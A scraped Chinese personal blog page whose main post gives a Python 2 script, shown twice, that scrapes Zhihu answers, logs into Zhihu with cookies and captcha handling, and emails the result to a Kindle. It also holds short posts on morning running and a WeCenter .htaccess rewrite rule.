to_mail = 'yourname@kindle.cn'

# send_kindle=MailAtt(smtp_server,from_mail,password,to_mail)
# send_kindle.send_txt(filename)

# 调用发送邮件函数，把电子书发送到你的kindle用户的邮箱账号，这样你的kindle就可以收到电子书啦
print filename

class MailAtt():
def __init__(self, smtp_server, from_mail, password, to_mail):
self.server = smtp_server
self.username = from_mail.split("@")[0]
self.from_mail = from_mail
self.password = password
self.to_mail = to_mail

# 初始化邮箱设置

def send_txt(self, filename):
# 这里发送附件尤其要注意字符编码，当时调试了挺久的，因为收到的文件总是乱码
self.smtp = smtplib.SMTP()
self.smtp.connect(self.server)
self.smtp.login(self.username, self.password)
self.msg = MIMEMultipart()
self.msg['to'] = self.to_mail
self.msg['from'] = self.from_mail
self.msg['Subject'] = "Convert"
self.filename = filename + ".txt"
self.msg['Date'] = Utils.formatdate(localtime=1)
content = open(self.filename.decode('utf-8'), 'rb').read()
# print content
self.att = MIMEText(content, 'base64', 'utf-8')
self.att['Content-Type'] = 'application/octet-stream'
# self.att["Content-Disposition"] = "attachment;filename=\"%s\"" %(self.filename.encode('gb2312'))
self.att["Content-Disposition"] = "attachment;filename=\"%s\"" % Header(self.filename, 'gb2312')
# print self.att["Content-Disposition"]
self.msg.attach(self.att)

self.smtp.sendmail(self.msg['from'], self.msg['to'], self.msg.as_string())
self.smtp.quit()

if __name__ == "__main__":

sub_folder = os.path.join(os.getcwd(), "content")
# 专门用于存放下载的电子书的目录

if not os.path.exists(sub_folder):
os.mkdir(sub_folder)

os.chdir(sub_folder)

id = sys.argv[1]
# 给出的第一个参数就是你要下载的问题的id
# 比如想要下载的问题链接是 https://www.zhihu.com/question/29372574
# 那么就输入 python zhihu.py 29372574

# id_link="/question/"+id
obj = GetContent(id)
# obj.getAnswer(id_link)

# 调用获取函数

print "Done"

#######################################
2016.8.19 更新
添加了新功能，模拟知乎登陆，自动获取自己关注的答案，制作成电子书并且发送到kindle

# -*-coding=utf-8-*-
__author__ = 'Rocky'
import requests
import cookielib
import re
import json
import time
import os
from getContent import GetContent
agent='Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'
headers={'Host':'www.zhihu.com',
'Referer':'https://www.zhihu.com',
'User-Agent':agent}

#全局变量
session=requests.session()

session.cookies=cookielib.LWPCookieJar(filename="cookies")

try:
session.cookies.load(ignore_discard=True)
except:
print "Cookie can't load"

def isLogin():
url='https://www.zhihu.com/settings/profile'
login_code=session.get(url,headers=headers,allow_redirects=False).status_code
print login_code
if login_code == 200:
return True
else:
return False

def get_xsrf():
url='http://www.zhihu.com'
r=session.get(url,headers=headers,allow_redirects=False)
txt=r.text
result=re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>',txt)[0]
return result

def getCaptcha():
#r=1471341285051
r=(time.time()*1000)
url='http://www.zhihu.com/captcha.gif?r='+str(r)+'&type=login'

image=session.get(url,headers=headers)
f=open("photo.jpg",'wb')
f.write(image.content)
f.close()

def Login():
xsrf=get_xsrf()
print xsrf
print len(xsrf)
login_url='http://www.zhihu.com/login/email'
data={
'_xsrf':xsrf,
'password':'*',
'remember_me':'true',
'email':'*'
}
try:
content=session.post(login_url,data=data,headers=headers)
login_code=content.text
print content.status_code
#this line important ! if no status, if will fail and execute the except part
#print content.status

if content.status_code != requests.codes.ok:
print "Need to verification code !"
getCaptcha()
#print "Please input the code of the captcha"
code=raw_input("Please input the code of the captcha")
data['captcha']=code
content=session.post(login_url,data=data,headers=headers)
print content.status_code

if content.status_code==requests.codes.ok:
print "Login successful"
session.cookies.save()
#print login_code
else:
session.cookies.save()
except:
print "Error in login"
return False

def focus_question():
focus_id=
url='https://www.zhihu.com/question/following'
content=session.get(url,headers=headers)
print content
p=re.compile(r'<a class="question_link" href="/question/(\d+)" target="_blank" data-id')
id_list=p.findall(content.text)
pattern=re.compile(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>')
result=re.findall(pattern,content.text)[0]
print result
for i in id_list:
print i
focus_id.append(i)

url_next='https://www.zhihu.com/node/ProfileFollowedQuestionsV2'
page=20
offset=20
end_page=500
xsrf=re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"',content.text)[0]
while offset < end_page:
#para='{"offset":20}'
#print para
print "page: %d" %offset
params={"offset":offset}
params_json=json.dumps(params)

data={
'method':'next',
'params':params_json,
'_xsrf':xsrf
}
#注意上面那里 post的data需要一个xsrf的字段，不然会返回403 的错误，这个在抓包的过程中一直都没有看到提交到xsrf，所以自己摸索出来的
offset=offset+page
headers_l={
'Host':'www.zhihu.com',
'Referer':'https://www.zhihu.com/question/following',
'User-Agent':agent,
'Origin':'https://www.zhihu.com',
'X-Requested-With':'XMLHttpRequest'
}
try:
s=session.post(url_next,data=data,headers=headers_l)
#print s.status_code
#print s.text
msgs=json.loads(s.text)
msg=msgs['msg']
for i in msg:
id_sub=re.findall(p,i)

for j in id_sub:
print j
id_list.append(j)

except:
print "Getting Error "

return id_list

def main():

if isLogin():
print "Has login"
else:
print "Need to login"
Login()
list_id=focus_question()
for i in list_id:
print i
obj=GetContent(i)

#getCaptcha()
if __name__=='__main__':
sub_folder=os.path.join(os.getcwd(),"content")
#专门用于存放下载的电子书的目录

if not os.path.exists(sub_folder):
os.mkdir(sub_folder)

os.chdir(sub_folder)

main()

完整代码请猛击这里:
github: https://github.com/Rockyzsu/zhihuToKindle
查看全部

平时逛知乎，上班的时候看到一些好的答案，不过由于答案太长，没来得及看完，所以自己写了个python脚本，把自己想要的答案抓取下来，并且推送到kindle上，下班后用kindle再慢慢看。平时喜欢的内容也可以整理成电子书抓取下来，等周末闲时看。

#2016-08-19更新：
添加了模拟登陆知乎的模块，自动获取自己的关注的问题id，然后把这些问题的所有答案抓取下来推送到kindle

# -*-coding=utf-8-*-

__author__ = 'Rocky'

# -*-coding=utf-8-*-

from email.mime.text import MIMEText

from email.mime.multipart import MIMEMultipart

import smtplib

from email import Encoders, Utils

import urllib2

import time

import re

import sys

import os



from bs4 import BeautifulSoup



from email.Header import Header



reload(sys)

sys.setdefaultencoding('utf-8')





class GetContent():

    def __init__(self, id):



        # 给出的第一个参数 就是你要下载的问题的id

        # 比如 想要下载的问题链接是 https://www.zhihu.com/question/29372574

        # 那么 就输入 python zhihu.py 29372574



        id_link = "/question/" + id

        self.getAnswer(id_link)



    def save2file(self, filename, content):

        # 保存为电子书文件

        filename = filename + ".txt"

        f = open(filename, 'a')

        f.write(content)

        f.close()



    def getAnswer(self, answerID):

        host = "http://www.zhihu.com"

        url = host + answerID

        print url

        user_agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

        # 构造header 伪装一下

        header = {"User-Agent": user_agent}

        req = urllib2.Request(url, headers=header)



        try:

            resp = urllib2.urlopen(req)

        except:

            print "Time out. Retry"

            time.sleep(30)

            # try to switch with proxy ip

            resp = urllib2.urlopen(req)

        # 这里已经获取了 网页的代码，接下来就是提取你想要的内容。 使用beautifulSoup 来处理，很方便

        try:

            bs = BeautifulSoup(resp)



        except:

            print "Beautifulsoup error"

            return None



        title = bs.title

        # 获取的标题



        filename_old = title.string.strip()

        print filename_old

        filename = re.sub('[\/:*?"<>|]', '-', filename_old)

        # 用来保存内容的文件名，因为文件名不能有一些特殊符号，所以使用正则表达式过滤掉



        self.save2file(filename, title.string)





        detail = bs.find("div", class_="zm-editable-content")



        self.save2file(filename, "\n\n\n\n--------------------Detail----------------------\n\n")

        # 获取问题的补充内容



        if detail is not None:



            for i in detail.strings:

                self.save2file(filename, unicode(i))



        answer = bs.find_all("div", class_="zm-editable-content clearfix")

        k = 0

        index = 0

        for each_answer in answer:



            self.save2file(filename, "\n\n-------------------------answer %s via  -------------------------\n\n" % k)



            for a in each_answer.strings:

                # 循环获取每一个答案的内容，然后保存到文件中

                self.save2file(filename, unicode(a))

            k += 1

            index = index + 1



        smtp_server = 'smtp.126.com'

        from_mail = 'your@126.com'

        password = 'yourpassword'

        to_mail = 'yourname@kindle.cn'



        # send_kindle=MailAtt(smtp_server,from_mail,password,to_mail)

        # send_kindle.send_txt(filename)



        # 调用发送邮件函数，把电子书发送到你的kindle用户的邮箱账号，这样你的kindle就可以收到电子书啦

        print filename





class MailAtt():

    def __init__(self, smtp_server, from_mail, password, to_mail):

        self.server = smtp_server

        self.username = from_mail.split("@")[0]

        self.from_mail = from_mail

        self.password = password

        self.to_mail = to_mail



        # 初始化邮箱设置



    def send_txt(self, filename):

        # 这里发送附件尤其要注意字符编码，当时调试了挺久的，因为收到的文件总是乱码

        self.smtp = smtplib.SMTP()

        self.smtp.connect(self.server)

        self.smtp.login(self.username, self.password)

        self.msg = MIMEMultipart()

        self.msg['to'] = self.to_mail

        self.msg['from'] = self.from_mail

        self.msg['Subject'] = "Convert"

        self.filename = filename + ".txt"

        self.msg['Date'] = Utils.formatdate(localtime=1)

        content = open(self.filename.decode('utf-8'), 'rb').read()

        # print content

        self.att = MIMEText(content, 'base64', 'utf-8')

        self.att['Content-Type'] = 'application/octet-stream'

        # self.att["Content-Disposition"] = "attachment;filename=\"%s\"" %(self.filename.encode('gb2312'))

        self.att["Content-Disposition"] = "attachment;filename=\"%s\"" % Header(self.filename, 'gb2312')

        # print self.att["Content-Disposition"]

        self.msg.attach(self.att)



        self.smtp.sendmail(self.msg['from'], self.msg['to'], self.msg.as_string())

        self.smtp.quit()





if __name__ == "__main__":



    sub_folder = os.path.join(os.getcwd(), "content")

    # 专门用于存放下载的电子书的目录



    if not os.path.exists(sub_folder):

        os.mkdir(sub_folder)



    os.chdir(sub_folder)



    id = sys.argv[1]

    # 给出的第一个参数 就是你要下载的问题的id

    # 比如 想要下载的问题链接是 https://www.zhihu.com/question/29372574

    # 那么 就输入 python zhihu.py 29372574





    # id_link="/question/"+id

    obj = GetContent(id)

    # obj.getAnswer(id_link)



    # 调用获取函数



    print "Done"

#######################################
2016.8.19 更新
添加了新功能，模拟知乎登陆，自动获取自己关注的答案，制作成电子书并且发送到kindle

# -*-coding=utf-8-*-

__author__ = 'Rocky'

import requests

import cookielib

import re

import json

import time

import os

from getContent import GetContent

agent='Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0'

headers={'Host':'www.zhihu.com',

         'Referer':'https://www.zhihu.com',

         'User-Agent':agent}



#全局变量

session=requests.session()



session.cookies=cookielib.LWPCookieJar(filename="cookies")



try:

    session.cookies.load(ignore_discard=True)

except:

    print "Cookie can't load"



def isLogin():

    url='https://www.zhihu.com/settings/profile'

    login_code=session.get(url,headers=headers,allow_redirects=False).status_code

    print login_code

    if login_code == 200:

        return True

    else:

        return False



def get_xsrf():

    url='http://www.zhihu.com'

    r=session.get(url,headers=headers,allow_redirects=False)

    txt=r.text

    result=re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>',txt)[0]

    return result



def getCaptcha():

    #r=1471341285051

    r=(time.time()*1000)

    url='http://www.zhihu.com/captcha.gif?r='+str(r)+'&type=login'



    image=session.get(url,headers=headers)

    f=open("photo.jpg",'wb')

    f.write(image.content)

    f.close()





def Login():

    xsrf=get_xsrf()

    print xsrf

    print len(xsrf)

    login_url='http://www.zhihu.com/login/email'

    data={

    '_xsrf':xsrf,

    'password':'*',

    'remember_me':'true',

    'email':'*'

    }

    try:

        content=session.post(login_url,data=data,headers=headers)

        login_code=content.text

        print content.status_code

        #this line important ! if no status, if will fail and execute the except part

        #print content.status



        if content.status_code != requests.codes.ok:

            print "Need to verification code !"

            getCaptcha()

            #print "Please input the code of the captcha"

            code=raw_input("Please input the code of the captcha")

            data['captcha']=code

            content=session.post(login_url,data=data,headers=headers)

            print content.status_code



            if content.status_code==requests.codes.ok:

                print "Login successful"

                session.cookies.save()

            #print login_code

        else:

            session.cookies.save()

    except:

        print "Error in login"

        return False



def focus_question():

    focus_id=

    url='https://www.zhihu.com/question/following'

    content=session.get(url,headers=headers)

    print content

    p=re.compile(r'<a class="question_link" href="/question/(\d+)" target="_blank" data-id')

    id_list=p.findall(content.text)

    pattern=re.compile(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"/>')

    result=re.findall(pattern,content.text)[0]

    print result

    for i in id_list:

        print i

        focus_id.append(i)



    url_next='https://www.zhihu.com/node/ProfileFollowedQuestionsV2'

    page=20

    offset=20

    end_page=500

    xsrf=re.findall(r'<input type=\"hidden\" name=\"_xsrf\" value=\"(\w+)\"',content.text)[0]

    while offset < end_page:

        #para='{"offset":20}'

        #print para

        print "page: %d" %offset

        params={"offset":offset}

        params_json=json.dumps(params)



        data={

        'method':'next',

        'params':params_json,

        '_xsrf':xsrf

        }

        #注意上面那里 post的data需要一个xsrf的字段，不然会返回403 的错误，这个在抓包的过程中一直都没有看到提交到xsrf，所以自己摸索出来的

        offset=offset+page

        headers_l={

        'Host':'www.zhihu.com',

        'Referer':'https://www.zhihu.com/question/following',

        'User-Agent':agent,

        'Origin':'https://www.zhihu.com',

        'X-Requested-With':'XMLHttpRequest'

        }

        try:

            s=session.post(url_next,data=data,headers=headers_l)

            #print s.status_code

            #print s.text

            msgs=json.loads(s.text)

            msg=msgs['msg']

            for i in msg:

                id_sub=re.findall(p,i)



                for j in id_sub:

                    print j

                    id_list.append(j)



        except:

            print "Getting Error "





    return id_list



def main():



    if isLogin():

        print "Has login"

    else:

        print "Need to login"

        Login()

    list_id=focus_question()

    for i in list_id:

        print i

        obj=GetContent(i)



    #getCaptcha()

if __name__=='__main__':

    sub_folder=os.path.join(os.getcwd(),"content")

    #专门用于存放下载的电子书的目录



    if not os.path.exists(sub_folder):

        os.mkdir(sub_folder)



    os.chdir(sub_folder)



    main()

完整代码请猛击这里:
github: https://github.com/Rockyzsu/zhihuToKindle

如何高效地利用时间－－在高盛工作8年的学姐

30天新尝试 • 低调的哥哥发表了文章 • 0 个评论 • 3140 次浏览 • 2016-05-10 23:15 • 来自相关话题

晨跑30分钟 30天

默认分类 • 低调的哥哥发表了文章 • 0 个评论 • 3914 次浏览 • 2016-05-09 21:54 • 来自相关话题

曾经，哦不，是一直到现在，我几乎没有在6点前起过床。然后每天却在叫嚷，时间不够用呀，然后就是熬夜晚睡。虽然知道熬夜等于慢性自杀，可是，和很多人一样，道理都懂，却总是无法彻底执行，每次脑子的两个小人，恶魔总是轻而易举地战胜了天使。而养成一个习惯，至少要30天。

说实话，我本子记录的计划多的不胜枚举，可是真正被窝执行的却寥寥无几。包括标题的这个，6点起床，晨跑30分钟。只不过，这一次把笔记本上的记录搬上自己的网站啦。我不想在众目睽睽之下失信。我觉得这样会让我执行计划的时候更加坚决。

早起去跑步的好处是：

晨跑能迫使人早起。是的，正常的话我要睡到8点，早起跑完步还可以多出一个半小时来做其他事情。

晨跑能够提高人整天的代谢水平，从而是全天的能量消耗达到一个较高值，对减肥来说是很有益的。简单来说，晨跑30分钟全天的总代谢就能上升一个台阶，这个比以同样速度夜跑30分钟要有效的多。

晨跑能让人从一夜的睡眠中清醒过来并维持全天的良好身体状态。

晨跑能迅速提升人体的循环，排出一夜睡眠后积累在体内的代谢废物。跑过晨跑后，代谢废物的排出要比不跑快很多。

看完上面那几条，你是不是也心动想要一起行动呢？是的话赶紧加入吧。和我比比，看谁坚持的时间长哦～查看全部

曾经，哦不，是一直到现在，我几乎没有在6点前起过床。然后每天却在叫嚷，时间不够用呀，然后就是熬夜晚睡。虽然知道熬夜等于慢性自杀，可是，和很多人一样，道理都懂，却总是无法彻底执行，每次脑子的两个小人，恶魔总是轻而易举地战胜了天使。而养成一个习惯，至少要30天。

说实话，我本子记录的计划多的不胜枚举，可是真正被窝执行的却寥寥无几。包括标题的这个，6点起床，晨跑30分钟。只不过，这一次把笔记本上的记录搬上自己的网站啦。我不想在众目睽睽之下失信。我觉得这样会让我执行计划的时候更加坚决。

早起去跑步的好处是：

晨跑能迫使人早起。是的，正常的话我要睡到8点，早起跑完步还可以多出一个半小时来做其他事情。

晨跑能够提高人整天的代谢水平，从而是全天的能量消耗达到一个较高值，对减肥来说是很有益的。简单来说，晨跑30分钟全天的总代谢就能上升一个台阶，这个比以同样速度夜跑30分钟要有效的多。

晨跑能让人从一夜的睡眠中清醒过来并维持全天的良好身体状态。

晨跑能迅速提升人体的循环，排出一夜睡眠后积累在体内的代谢废物。跑过晨跑后，代谢废物的排出要比不跑快很多。

看完上面那几条，你是不是也心动想要一起行动呢？是的话赶紧加入吧。和我比比，看谁坚持的时间长哦～

wecenter 伪静态规则设置针对虚拟主机

默认分类 • 低调的哥哥发表了文章 • 0 个评论 • 4124 次浏览 • 2016-05-09 16:42 • 来自相关话题

不得不吐槽一下这个社区的运营的支持，做的比较弱。缺乏足够技术文档支持，大部分需要用户自己谷歌百度去解决问题。我自己也走了不少的弯路，所以写下来帮助有需要的朋友。

对于虚拟主机（apache的主机），wecenter的伪静态链接的设置，只能通过ftp上传文件来实现。
首先创建一个.htaccess的文件，输入以下内容：<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php/$1 [QSA,PT,L]
</IfModule>
然后上传到网站的根目录下，比如/var/www，然后在wecenter的后台中，进入->管理，进入全局设置->站点功能,然后开启“开启 Rewrite 伪静态” 功能就可以了。

亲测可行。查看全部

不得不吐槽一下这个社区的运营的支持，做的比较弱。缺乏足够技术文档支持，大部分需要用户自己谷歌百度去解决问题。我自己也走了不少的弯路，所以写下来帮助有需要的朋友。

对于虚拟主机（apache的主机），wecenter的伪静态链接的设置，只能通过ftp上传文件来实现。
首先创建一个.htaccess的文件，输入以下内容：

<IfModule mod_rewrite.c>

RewriteEngine on

RewriteCond %{REQUEST_FILENAME} !-d

RewriteCond %{REQUEST_FILENAME} !-f

RewriteRule ^(.*)$ index.php/$1 [QSA,PT,L]

</IfModule>

然后上传到网站的根目录下，比如/var/www，然后在wecenter的后台中，进入->管理，进入全局设置->站点功能,然后开启“开启 Rewrite 伪静态” 功能就可以了。

亲测可行。

30天

默认分类 • 低调的哥哥发表了文章 • 0 个评论 • 3502 次浏览 • 2016-04-12 19:40 • 来自相关话题

做这个网站，挺辛苦的。

通知设置新通知

发现